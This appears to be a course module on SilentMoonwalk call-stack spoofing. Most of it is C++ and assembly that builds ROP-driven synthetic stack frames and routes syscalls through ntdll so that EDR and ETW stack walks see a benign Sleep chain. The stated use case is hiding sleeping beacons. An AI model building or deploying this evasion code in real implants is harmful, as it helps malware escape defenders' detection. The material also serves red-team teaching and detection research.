Module 7: The Full Spoof Engine
Assembling every piece into a complete, walkable, executable spoofed call stack.
The Complete Picture
This module brings together everything from the previous six modules into SilentMoonwalk's end-to-end algorithm. We'll trace the complete lifecycle: from selecting a target call chain, through gadget matching and frame construction, to the actual ROP-driven syscall invocation with a fully spoofed stack. This is the algorithm that makes SilentMoonwalk a generation ahead of prior approaches.
High-Level Algorithm Overview
SilentMoonwalk's spoofing engine executes in several phases. Each phase builds on the results of the previous one:
SilentMoonwalk Execution Phases
Initialization
Chain Selection
Frame Fabrication
ROP Assembly
Execution
Phase 1: Initialization
At startup, SilentMoonwalk scans loaded modules to build its gadget database and function catalog:
C++// Phase 1: One-time initialization
class SpoofEngine {
GadgetDB gadgets;
std::vector<FunctionInfo> functionCatalog;
HMODULE hNtdll;
HMODULE hKernel32;
HMODULE hKernelBase;
void Initialize() {
// 1. Get handles to system modules
hNtdll = GetModuleHandleA("ntdll.dll");
hKernel32 = GetModuleHandleA("kernel32.dll");
hKernelBase = GetModuleHandleA("kernelbase.dll");
// 2. Build gadget database from all system modules
gadgets.Build(hNtdll);
gadgets.Build(hKernel32);
gadgets.Build(hKernelBase);
// 3. Catalog all functions with their frame sizes
CatalogFunctions(hNtdll);
CatalogFunctions(hKernel32);
CatalogFunctions(hKernelBase);
// 4. Identify critical termination frames
// Every thread stack ends with these two frames
resolveTerminalFrames();
}
void resolveTerminalFrames() {
// All Windows threads have this at the bottom of their stack:
// kernel32!BaseThreadInitThunk+0x14
// ntdll!RtlUserThreadStart+0x21
// We need the RUNTIME_FUNCTION for each to compute
// their exact frame sizes for the synthetic chain.
DWORD64 imgBase;
pBaseThreadInitThunk = RtlLookupFunctionEntry(
(DWORD64)GetProcAddress(hKernel32, "BaseThreadInitThunk"),
&imgBase, NULL
);
pRtlUserThreadStart = RtlLookupFunctionEntry(
(DWORD64)GetProcAddress(hNtdll, "RtlUserThreadStart"),
&imgBase, NULL
);
}
};
Phase 2: Call Chain Selection
When a spoofed call is requested, SilentMoonwalk selects a realistic call chain. The chain must be plausible for the type of API being called. For example, a thread sleeping via NtWaitForSingleObject should show a chain involving the Sleep family of functions:
C++// Phase 2: Select a plausible call chain for the target syscall
struct CallChainSpec {
PVOID targetApi; // The actual API to call
std::vector<PVOID> spoofedChain; // Functions to appear on stack
};
CallChainSpec SelectCallChain(PVOID targetApi) {
CallChainSpec spec;
spec.targetApi = targetApi;
// Build a realistic chain ending at the standard thread entry
// For NtWaitForSingleObject, a typical chain might be:
//
// NtWaitForSingleObject (the syscall itself)
// KERNELBASE!WaitForSingleObjectEx (wrapper that calls Nt*)
// kernel32!SleepEx (high-level sleep function)
// kernel32!Sleep (simplest sleep wrapper)
// <application function> (we skip this - too specific)
// kernel32!BaseThreadInitThunk (standard thread entry)
// ntdll!RtlUserThreadStart (thread bootstrap)
spec.spoofedChain = {
GetProcAddress(hKernelBase, "WaitForSingleObjectEx"),
GetProcAddress(hKernel32, "SleepEx"),
GetProcAddress(hKernel32, "Sleep"),
GetProcAddress(hKernel32, "BaseThreadInitThunk"),
GetProcAddress(hNtdll, "RtlUserThreadStart")
};
return spec;
}
Chain Plausibility
The spoofed chain should represent a realistic call path. An EDR might cross-reference the chain to verify that function A actually calls function B in its code. SilentMoonwalk selects functions from known call paths in the Windows API. For sleeping beacons, the Sleep → SleepEx → WaitForSingleObjectEx → NtWaitForSingleObject chain is one of the most common patterns in legitimate software.
Phase 3: Frame Fabrication
With the call chain selected, SilentMoonwalk computes the frame size for each function and allocates the synthetic stack space:
C++// Phase 3: Compute frame sizes and build synthetic frame map
struct SyntheticFrame {
PRUNTIME_FUNCTION pFunc;
PUNWIND_INFO pUnwind;
DWORD frameSize; // Allocation + pushes
DWORD totalSize; // Including return address slot
PVOID returnAddr; // Points into next function in chain
DWORD stackOffset; // Offset from synthetic stack base
std::vector<RegisterSave> savedRegs; // Non-volatile reg saves
};
std::vector<SyntheticFrame> FabricateFrames(CallChainSpec& spec) {
std::vector<SyntheticFrame> frames;
DWORD totalStackNeeded = 0;
for (size_t i = 0; i < spec.spoofedChain.size(); i++) {
SyntheticFrame sf;
DWORD64 imageBase;
// Look up the RUNTIME_FUNCTION for this chain entry
sf.pFunc = RtlLookupFunctionEntry(
(DWORD64)spec.spoofedChain[i], &imageBase, NULL
);
sf.pUnwind = (PUNWIND_INFO)(imageBase + sf.pFunc->UnwindData);
sf.frameSize = ComputeFrameSize(sf.pUnwind);
sf.totalSize = sf.frameSize + 8; // +8 for return address
// Determine return address: point into the NEXT function
if (i + 1 < spec.spoofedChain.size()) {
sf.returnAddr = FindReturnAddress(
/* next func's RUNTIME_FUNCTION */
LookupFunc(spec.spoofedChain[i + 1]),
imageBase
);
} else {
sf.returnAddr = NULL; // Terminal frame
}
// Parse saved register locations from unwind codes
sf.savedRegs = ParseRegisterSaves(sf.pUnwind);
sf.stackOffset = totalStackNeeded;
totalStackNeeded += sf.totalSize;
frames.push_back(sf);
}
return frames;
}
Phase 4: ROP Chain Assembly
This is the most complex phase. The synthetic frame data must simultaneously serve as a valid ROP chain for execution AND a valid unwind chain for inspection. SilentMoonwalk weaves gadget addresses into the frame data at positions that are both reachable during ROP execution and benign during unwinding:
C++// Phase 4: Assemble the dual-purpose stack layout
void AssembleRopChain(
PBYTE syntheticStack,
std::vector<SyntheticFrame>& frames,
PVOID targetApi,
PVOID targetApiArgs[4], // RCX, RDX, R8, R9
PVOID rbxTrampoline // Pointer to memory holding targetApi addr
) {
DWORD offset = 0;
// === STAGE A: Parameter setup (before the spoofed frames) ===
// Place POP gadgets to load API arguments into registers
// These execute first in the ROP chain
// pop rcx; ret -- loads first argument
*(PVOID*)(syntheticStack + offset) = gadgets.popRcx;
offset += 8;
*(PVOID*)(syntheticStack + offset) = targetApiArgs[0]; // RCX value
offset += 8;
// pop rdx; ret -- loads second argument
*(PVOID*)(syntheticStack + offset) = gadgets.popRdx;
offset += 8;
*(PVOID*)(syntheticStack + offset) = targetApiArgs[1]; // RDX value
offset += 8;
// pop r8; ret -- loads third argument
*(PVOID*)(syntheticStack + offset) = gadgets.popR8;
offset += 8;
*(PVOID*)(syntheticStack + offset) = targetApiArgs[2]; // R8 value
offset += 8;
// pop r9; ret -- loads fourth argument
*(PVOID*)(syntheticStack + offset) = gadgets.popR9;
offset += 8;
*(PVOID*)(syntheticStack + offset) = targetApiArgs[3]; // R9 value
offset += 8;
// === STAGE B: JMP [RBX] trampoline ===
// RBX was set up earlier to point to memory containing targetApi addr
// The JMP transfers control WITHOUT pushing a return address
*(PVOID*)(syntheticStack + offset) = gadgets.jmpRbx;
offset += 8;
// === STAGE C: Fake return address ===
// When targetApi executes RET, it pops this address.
// This is where the spoofed stack begins from the unwinder's view.
// It points into the first function in our spoofed chain.
*(PVOID*)(syntheticStack + offset) = frames[0].returnAddr;
offset += 8;
// === STAGE D: Synthetic frames ===
// Each frame occupies exactly the right number of bytes
for (size_t i = 0; i < frames.size(); i++) {
SyntheticFrame& sf = frames[i];
// Fill frame body with plausible data
// The local variable area can contain recovery gadgets
FillFrameBody(syntheticStack + offset, sf);
// Place saved register values at correct offsets
for (auto& reg : sf.savedRegs) {
*(DWORD64*)(syntheticStack + offset + reg.stackOffset) =
GeneratePlausibleRegValue(hNtdll, hKernel32);
}
// Place return address at end of frame
*(PVOID*)(syntheticStack + offset + sf.frameSize) = sf.returnAddr;
offset += sf.totalSize;
}
}
The Dual-Purpose Challenge
The stack bytes between the JMP [RBX] trampoline and the first return address serve double duty. During ROP execution, RSP advances through parameter setup gadgets and then the trampoline transfers to the target API. During stack unwinding (triggered by an EDR), the unwinder starts at the return address and walks backward through the synthetic frames. These two traversals operate on overlapping but different portions of the stack data, which is why careful offset calculation is essential.
Phase 5: Execution
With the synthetic stack fully assembled, SilentMoonwalk pivots RSP to the synthetic stack and begins the ROP chain. This is done via an assembly stub:
x86-64 ASM; SilentMoonwalk's execution stub (simplified)
; Called from C++ with the synthetic stack address in RCX
SpoofAndCall PROC
; Save all non-volatile registers (callee-saved)
push rbp
push rbx
push rdi
push rsi
push r12
push r13
push r14
push r15
; Save the real RSP so we can restore it later
mov r15, rsp ; R15 = real stack pointer (saved)
; Set up RBX for the JMP [RBX] trampoline
; RCX = pointer to struct { PVOID pTargetApi; BYTE syntheticStack[...]; }
lea rbx, [rcx] ; RBX = pointer to target API address
; Pivot RSP to the synthetic stack
; The ROP chain starts at offset 8 in the synthetic buffer
lea rsp, [rcx + 8] ; RSP now points to our ROP chain
; Begin ROP execution:
; RSP -> [pop rcx gadget addr]
; [RCX value]
; [pop rdx gadget addr]
; [RDX value]
; ... (parameter setup)
; [JMP [RBX] gadget addr]
;
; The first RET pops and jumps to pop rcx gadget.
; Each gadget's RET chains to the next.
; JMP [RBX] transfers to the target API.
; Target API's RET lands on our spoofed return address.
ret ; Start the ROP chain!
; === Recovery point ===
; After the target API returns through the spoofed chain,
; a recovery gadget redirects execution here
RecoveryPoint:
; Restore real RSP
mov rsp, r15
; Restore non-volatile registers
pop r15
pop r14
pop r13
pop r12
pop rsi
pop rdi
pop rbx
pop rbp
ret ; Return to caller with spoofed call complete
SpoofAndCall ENDP
The Recovery Mechanism
After the target API returns through the spoofed stack frames, execution must return to the real code. SilentMoonwalk embeds a recovery gadget address within the synthetic frames that, when reached during ROP unwinding, redirects execution back to the recovery point:
C++// The recovery mechanism:
// 1. Target API (e.g., NtWaitForSingleObject) returns
// 2. It pops the first spoofed return address from the stack
// 3. Execution lands at the first frame's "body" area
// 4. The frame body contains an ADD RSP, N; RET gadget that
// advances RSP through the frame to the next return address
// 5. This chain continues through each synthetic frame
// 6. The last frame's return address points to the RecoveryPoint
// in the assembly stub
// 7. Execution returns to the real caller with the original RSP
// Alternatively, a simpler recovery approach:
// The first spoofed return address can directly point to a
// gadget that restores RSP from a saved register (e.g., R15):
// mov rsp, r15
// ret
// This immediately collapses the synthetic stack and returns
// to the real code. However, this gadget is harder to find
// with valid unwind metadata.
Complete Execution Timeline
Handling the Syscall Boundary
For direct syscalls (where the beacon invokes the syscall instruction directly rather than calling through ntdll), SilentMoonwalk must ensure the stack is clean at the exact moment the syscall instruction executes. The kernel captures the user-mode stack trace at syscall entry:
C++// For direct syscall invocation with spoofed stack:
// The synthetic stack must be in place BEFORE the syscall instruction.
//
// Approach:
// 1. Build synthetic stack as above
// 2. Place the syscall stub (mov r10, rcx; mov eax, SSN; syscall)
// at the bottom of the ROP chain, OR
// 3. Use the JMP [RBX] gadget to jump to ntdll's syscall stub
// (the actual 'syscall' instruction inside ntdll)
//
// Option 3 is preferred because:
// - The return address on the stack (pushed by nothing - we used JMP)
// is our spoofed address pointing into a legitimate function
// - The kernel sees RSP pointing to our synthetic stack
// - ETW stack capture walks our synthetic frames correctly
// - The syscall instruction itself is inside ntdll (legitimate location)
The Elegance of JMP-Based Syscalls
By using JMP [RBX] to reach ntdll's syscall stub instead of CALL, SilentMoonwalk avoids pushing any return address. The stack at the moment of syscall execution contains only the synthetic frames. The kernel's ETW stack walker processes these frames using RtlVirtualUnwind and sees a completely normal call chain. This is why JMP [RBX] is the linchpin of the entire technique.
Complete Data Flow
Here is the complete data dependency between all components:
| Component | Inputs | Outputs | Consumed By |
|---|---|---|---|
| Module Scanner | ntdll, kernel32 .pdata | Function catalog + UNWIND_INFO | Gadget search, frame fabrication |
| Gadget Scanner | .text sections, RUNTIME_FUNCTIONs | Gadget database (indexed by type/size) | ROP chain assembly |
| Chain Selector | Target API identity | Ordered list of spoofed functions | Frame fabrication |
| Frame Fabricator | Chain spec + UNWIND_INFOs | Frame sizes, register save maps, return addrs | ROP assembly |
| ROP Assembler | Gadgets + frames + API args | Synthetic stack buffer | Execution stub |
| Execution Stub | Synthetic stack + RSP pivot | API call with spoofed stack | Target API |
Pop Quiz: The Full Spoof Engine
Q1: Why does SilentMoonwalk use JMP [RBX] to invoke the target API instead of CALL?
Q2: What are the "terminal frames" that every spoofed chain must end with?
Q3: How does SilentMoonwalk return to the real caller after the target API completes?